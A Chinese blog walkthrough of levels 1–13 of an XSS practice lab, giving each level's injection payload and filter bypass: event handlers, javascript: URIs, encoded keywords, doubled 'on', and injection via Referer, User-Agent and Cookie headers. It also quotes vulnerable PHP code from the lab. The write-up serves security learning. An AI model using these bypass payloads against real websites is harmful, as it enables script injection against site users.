xsschallenge靶场练习1-13关

这篇具有很好参考价值的文章主要介绍了xsschallenge靶场练习1-13关。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

靶场在线地址 : http://test.xss.tv

第一关

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

观察页面

http://192.168.80.139/xsschallenge/level1.php?name=test

尝试在name=后面输入最近基本的xss语法

<script>alert(1)</script>

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第二关

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

查看页面源代码

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

可以通过构造闭合

"> <script>alert(1)</script>

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第三关

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

查看页面源代码

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

发现过滤了特殊字符

通过单引号闭合,使用触发事件来绕过

' οnclick='alert(/xss/)

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第四关

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

过滤了< >标签

可是试着尝试上一关的方法

" οnclick="alert(1)

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第五关

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

通过查看源码得知,替换了scriptscr_ipt

使用大写绕过,看看是否可行

<SCRIPT>alert(10)</SCRIPT>

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

发现还是不行,后端把 我们输入的大写,替换成了小写

尝试其他方法绕过,使用伪协议

"> <a href=javascript:alert(1)>demo</a>

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第六关

输入<script>alert(1)</script>测试,查看源代码,依旧替换了script

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

"><Img sRc=# OnErRoR=alert(/xss/);>

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第七关

使用上一关的通过代码,发现把on给过滤掉 了,还把href给过滤了

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

我们可以尝试点击事件,双写on,来绕过

" oonnclick=alert(1)//

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第八关

在页面输入框中输入" onclick=alert(1)//

查看页面源代码,发现双引号被做了转义,只能通过其他方式去绕过

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

可以↓方式去绕过

j&#9;avasc&#10;r&#13;ipt:alert(/xss/)

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第九关

j&#9;avasc&#10;r&#13;ipt:alert('http://')

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第十关

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

没有输入框可以在地址栏中绕过

192.168.80.139/xsschallenge/level10.php?keyword=<script>alert(1)</script>

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

页面没有反应,

查看页面源代码,发现三个隐藏起来的输入框

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

可以尝试使用t_link\t_history\t_sort这三个 挨个尝试

发现只有 在t_sort输入的时候,才有变化

http://192.168.80.139/xsschallenge/level10.php?t_sort=<script>alert(1)</script>

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

构造其他方法

" type="test" οnclick="alert(1)

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第十一关

代码审计

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

查看页面代码

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

发现t_refvalue值是第十关的 地址

" type="button" οnclick="alert(1)

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

也可以使用bp抓取数据包修改Referer字段的值

第十二关

代码审计

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
" type="button" οnmοuseοver="alert(1)"

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全

第十三关

代码审计

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
user=" type="button" οnmοuseοver="alert(1)"

xsschallenge靶场练习1-13关,# 渗透测试,xss,网络安全文章来源地址https://www.toymoban.com/news/detail-685389.html

到了这里,关于xsschallenge靶场练习1-13关的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [网络安全]xss-labs 本地靶场搭建详细教程

    本文以phpstudy搭建xss-labs本地靶场环境 PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。 官网安装地址: PhpStudy Download 链接 安装完成后打开PhpStudy 网站配置如下: xss-labs 靶机下载地址: https://github.com/do0d

    2024年02月08日
    浏览(34)
  • [网络安全]XSS之Cookie外带攻击姿势及例题详析(基于DVWA靶场)

    本文仅分享XSS攻击知识,不承担任何法律责任。 本文涉及的软件等请读者自行安装,本文不再赘述。 XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而 窃取用户的 Cookie 信息 。 在使用XSS语

    2024年02月08日
    浏览(49)
  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(48)
  • 16个网络安全常用的练习靶场(小白必备)

    DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 链接地址:http://www.dvwa.co.uk mutillidaemutillidae是一个免费,开源的Web应用程序,提供专门被允许的安全测试和入侵的Web应用程序。它是由Adrian “Ironge

    2024年02月02日
    浏览(42)
  • 【网络安全 --- 文件上传靶场练习】文件上传靶场安装以及1-5关闯关思路及技巧,源码分析

      首先分享一个自己做的很不错的网路安全笔记,内容详细介绍了许多知识 超详细的网络安全笔记 分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记​编辑https://m.tb.cn/h.5JdFcih?tk=OuVrWRl9vMx%20CZ3457 若已安装,请

    2024年02月06日
    浏览(41)
  • 记一次靶场搭建与渗透测试

    通过Windows7打入工作组环境,穿透两层内网拿到DC(域控制器)权限 环境搭建 网络拓扑 虚拟机网络配置 永恒之蓝外网打点 nmap -sS 192.168.2.0/24扫描外网存活主机,发现两台主机192.168.2.128和192.168.2.129,并且445端口都是打开的,可能存在永恒之蓝漏洞 用msf来进行永恒之蓝漏洞的

    2024年01月23日
    浏览(38)
  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(45)
  • 精通METASPLOIT渗透测试(第3版)自建docker靶场

    首先要感谢原书作者及国内译者(哈哈哈),书有了,但是靶场没有,给的GITHUB里也只是写payload片段,没有靶机看着确实无聊。自己动手做吧。开始是用的安装方式,但是这个无法分享。还是做成docker吧。我会做一个发一个。有些因为涉及提权,我还是按照书上建议的操作系

    2024年01月18日
    浏览(38)
  • xsschallenge1~13通关详细教程

    通过观察发现这个用户信息可以修改 那么我们直接输入攻击代码 弹框如下: 发现一个输入框,输入攻击代码观察页面反应 页面将我们的攻击代码进行了打印。 查看网页源代码,发现将我们输入的尖括号进行了转义。 源码 htmlspecialchars(string) : 把预定义的字符: “” (小

    2024年02月11日
    浏览(43)
  • 超细DVWA靶场搭建--(小黑栈渗透测试初级篇1)

    前言:对于渗透测试这块,最初阶段建议先学习一下前、后端知识,然后再学习一到两门语言,这样子方便后续的成为大佬做好基石。渗透测试的方向上建议先web渗透 --  APP渗透 --内网渗透,多打靶场多理解漏洞的原理和工具的利用,在学习的过程中遇到的问题多做笔记和记

    2024年01月21日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包